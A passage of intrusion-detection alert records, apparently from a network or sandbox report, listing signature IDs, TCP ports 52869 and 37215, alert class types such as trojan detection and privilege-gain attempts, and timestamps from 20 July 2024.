                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2025132
                      Source Port:55278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2829579
                      Source Port:36458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.431738
                      SID:2027339
                      Source Port:47802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2027339
                      Source Port:37022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.419958
                      SID:2025132
                      Source Port:50808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:39564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:38516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2831300
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.860442
                      SID:2027339
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.529848
                      SID:2025132
                      Source Port:59978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.123973
                      SID:2027339
                      Source Port:39268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.789977
                      SID:2831300
                      Source Port:43260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.132843
                      SID:2831300
                      Source Port:38484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.090929
                      SID:2027339
                      Source Port:39166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.444465
                      SID:2831300
                      Source Port:46488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.230515
                      SID:2025132
                      Source Port:41586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.758911
                      SID:2027339
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2025132
                      Source Port:34898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2025132
                      Source Port:57542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.153509
                      SID:2027339
                      Source Port:45270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:45960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:55798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2027339
                      Source Port:53360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2027339
                      Source Port:36152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2027339
                      Source Port:35430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2027339
                      Source Port:34586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2027339
                      Source Port:52548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.518543
                      SID:2835222
                      Source Port:48012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2829579
                      Source Port:46668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2027339
                      Source Port:56242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.841404
                      SID:2027339
                      Source Port:38638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:59386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:60316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.290865
                      SID:2027339
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2829579
                      Source Port:44696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.011261
                      SID:2025132
                      Source Port:57864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2831300
                      Source Port:58282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2027339
                      Source Port:38338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:36476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.215644
                      SID:2831300
                      Source Port:32926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.948391
                      SID:2027339
                      Source Port:59362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2831300
                      Source Port:42720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.667246
                      SID:2027339
                      Source Port:35168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:53584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.081824
                      SID:2027339
                      Source Port:36852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.922674
                      SID:2027339
                      Source Port:46298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.399887
                      SID:2027339
                      Source Port:49302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2025132
                      Source Port:34314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.853073
                      SID:2027339
                      Source Port:56406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2025132
                      Source Port:38090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.940741
                      SID:2831300
                      Source Port:46132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2829579
                      Source Port:59524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.094598
                      SID:2025132
                      Source Port:56784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.358816
                      SID:2025132
                      Source Port:57788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.801044
                      SID:2025132
                      Source Port:44588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2027339
                      Source Port:54064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2027339
                      Source Port:56764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.610183
                      SID:2027339
                      Source Port:46410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2027339
                      Source Port:53808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.806552
                      SID:2831300
                      Source Port:42192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.809338
                      SID:2025132
                      Source Port:36658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.972042
                      SID:2027339
                      Source Port:36494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2835222
                      Source Port:49302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.481216
                      SID:2025132
                      Source Port:43564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:36610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.422953
                      SID:2831300
                      Source Port:46502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.513503
                      SID:2027339
                      Source Port:42376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.782204
                      SID:2025132
                      Source Port:32906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2027339
                      Source Port:55378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.112360
                      SID:2027339
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.290200
                      SID:2025132
                      Source Port:48400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.611139
                      SID:2831300
                      Source Port:38190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.915135
                      SID:2027339
                      Source Port:60796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:48402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.711626
                      SID:2027339
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2829579
                      Source Port:41120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.940016
                      SID:2027339
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.124441
                      SID:2027339
                      Source Port:55004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.385927
                      SID:2025132
                      Source Port:48886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.565771
                      SID:2831300
                      Source Port:40992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.402123
                      SID:2027339
                      Source Port:52576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.229188
                      SID:2025132
                      Source Port:42048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.432345
                      SID:2025132
                      Source Port:49404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2027339
                      Source Port:42330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.407220
                      SID:2831300
                      Source Port:33068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.411596
                      SID:2025132
                      Source Port:41950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2835222
                      Source Port:40240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.230792
                      SID:2027339
                      Source Port:51684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:60894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.525551
                      SID:2025132
                      Source Port:43708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.322897
                      SID:2025132
                      Source Port:49074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2835222
                      Source Port:45548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.995248
                      SID:2027339
                      Source Port:59920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2831300
                      Source Port:39172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.811976
                      SID:2027339
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.627537
                      SID:2027339
                      Source Port:54870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.200731
                      SID:2831300
                      Source Port:44168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2027339
                      Source Port:46284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478141
                      SID:2027339
                      Source Port:34680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:39550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.157855
                      SID:2025132
                      Source Port:54260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.610993
                      SID:2027339
                      Source Port:50058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.006675
                      SID:2027339
                      Source Port:49290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:46650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2027339
                      Source Port:35384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344940
                      SID:2027339
                      Source Port:60226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2027339
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:12.667310
                      SID:2027339
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.004582
                      SID:2027339
                      Source Port:49712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.117518
                      SID:2025132
                      Source Port:39610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.111519
                      SID:2027339
                      Source Port:39046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2835222
                      Source Port:60136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.056587
                      SID:2027339
                      Source Port:49096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2027339
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:57690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.896111
                      SID:2025132
                      Source Port:52908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.252094
                      SID:2027339
                      Source Port:41486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2027339
                      Source Port:53210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2831300
                      Source Port:35480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:04.461996
                      SID:2027339
                      Source Port:35328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2027339
                      Source Port:54032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.896657
                      SID:2831300
                      Source Port:53500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.465472
                      SID:2027339
                      Source Port:36236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620653
                      SID:2027339
                      Source Port:36596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.043746
                      SID:2829579
                      Source Port:44424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:32820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.574592
                      SID:2025132
                      Source Port:56626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:42002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.558559
                      SID:2025132
                      Source Port:50544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.320247
                      SID:2027339
                      Source Port:36016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.395080
                      SID:2027339
                      Source Port:48076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.180750
                      SID:2027339
                      Source Port:60650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.359635
                      SID:2025132
                      Source Port:51164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2829579
                      Source Port:43310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.564435
                      SID:2025132
                      Source Port:52078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.246572
                      SID:2027339
                      Source Port:45802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2835222
                      Source Port:60270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.839926
                      SID:2027339
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472706
                      SID:2831300
                      Source Port:55108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2829579
                      Source Port:53132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.593708
                      SID:2027339
                      Source Port:42182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.790678
                      SID:2027339
                      Source Port:55368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.246625
                      SID:2027339
                      Source Port:40276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2025132
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2027339
                      Source Port:43514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.292919
                      SID:2027339
                      Source Port:57082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.943746
                      SID:2027339
                      Source Port:43756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2027339
                      Source Port:33754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2027339
                      Source Port:45360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.972496
                      SID:2025132
                      Source Port:45272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2831300
                      Source Port:42748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.986039
                      SID:2831300
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:38220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.080473
                      SID:2831300
                      Source Port:40774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.341019
                      SID:2025132
                      Source Port:56954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.061893
                      SID:2829579
                      Source Port:53586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.102034
                      SID:2025132
                      Source Port:59974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.571514
                      SID:2025132
                      Source Port:49078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.833995
                      SID:2027339
                      Source Port:57632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.732645
                      SID:2025132
                      Source Port:49138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.379204
                      SID:2831300
                      Source Port:55090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.843525
                      SID:2027339
                      Source Port:50212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2831300
                      Source Port:56148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.540920
                      SID:2027339
                      Source Port:34906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.534264
                      SID:2027339
                      Source Port:39696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2831300
                      Source Port:57514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.543705
                      SID:2025132
                      Source Port:45066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2025132
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.568828
                      SID:2027339
                      Source Port:53390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2831300
                      Source Port:54354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2829579
                      Source Port:56504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.791351
                      SID:2025132
                      Source Port:41062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.884219
                      SID:2831300
                      Source Port:41864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.251198
                      SID:2027339
                      Source Port:37786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.254464
                      SID:2831300
                      Source Port:53762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2835222
                      Source Port:36122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2027339
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.210836
                      SID:2027339
                      Source Port:45476
                      Destination Port:52869
                      Protocol:TCP
